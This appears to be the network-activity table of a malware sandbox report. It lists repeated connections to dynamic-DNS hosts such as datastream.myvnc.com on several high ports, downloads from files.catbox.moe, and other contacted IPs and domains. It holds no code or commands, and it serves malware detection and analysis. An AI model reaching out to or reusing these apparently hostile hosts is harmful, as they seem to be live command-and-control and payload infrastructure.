| NL | 142.251.36.1:443 | clients2.googleusercontent.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| US | 8.8.8.8:53 | 202.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.126.177.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.36.251.142.in-addr.arpa | udp |
| US | 108.177.126.138:443 | clients2.google.com | tcp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| US | 8.8.8.8:53 | api2.check-data.xyz | udp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| US | 44.236.198.167:80 | api2.check-data.xyz | tcp |
| US | 8.8.8.8:53 | 167.198.236.44.in-addr.arpa | udp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| US | 8.8.8.8:53 | files.catbox.moe | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| US | 188.114.97.0:80 | defrosscrappeo.pw | tcp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| US | 129.153.80.87:8855 | tcp | |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | retghrtgwtrgtg.bounceme.net | udp |
| RU | 91.215.85.63:3839 | retghrtgwtrgtg.bounceme.net | tcp |
| RU | 91.215.85.63:7020 | retghrtgwtrgtg.bounceme.net | tcp |
| RU | 91.215.85.63:5225 | retghrtgwtrgtg.bounceme.net | tcp |
| RU | 91.215.85.63:2718 | retghrtgwtrgtg.bounceme.net | tcp |
| US | 8.8.8.8:53 | center.onthewifi.com | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| US | 8.8.8.8:53 | datastream.myvnc.com | udp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 185.172.128.160:80 | 185.172.128.160 | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 160.128.172.185.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 188.114.97.0:80 | defrosscrappeo.pw | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 188.114.97.0:80 | defrosscrappeo.pw | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 188.114.97.0:80 | defrosscrappeo.pw | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 185.172.128.100:80 | 185.172.128.100 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 185.172.128.160:80 | 185.172.128.160 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 8.8.8.8:53 | 100.128.172.185.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 138.201.120.172:15648 | tcp | |
| US | 8.8.8.8:53 | 172.120.201.138.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | dh.haol23.me | udp |
| HK | 47.52.205.57:18818 | dh.haol23.me | udp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| KR | 38.6.193.13:8889 | udp | |
| US | 8.8.8.8:53 | 57.205.52.47.in-addr.arpa | udp |
| HK | 47.52.205.57:18818 | dh.haol23.me | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.ammyy.com | udp |
| US | 8.8.8.8:53 | pz.qishia.com | udp |
| DE | 136.243.18.118:80 | www.ammyy.com | tcp |
| DE | 136.243.18.118:80 | www.ammyy.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| KR | 38.6.193.13:80 | pz.qishia.com | tcp |
| US | 8.8.8.8:53 | 9.240.123.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.18.243.136.in-addr.arpa | udp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| US | 8.8.8.8:53 | chat.ammyy.com | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 136.243.18.119:443 | chat.ammyy.com | tcp |
| US | 8.8.8.8:53 | ssl.google-analytics.com | udp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| GB | 216.58.208.104:443 | ssl.google-analytics.com | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| GB | 216.58.208.104:443 | ssl.google-analytics.com | udp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
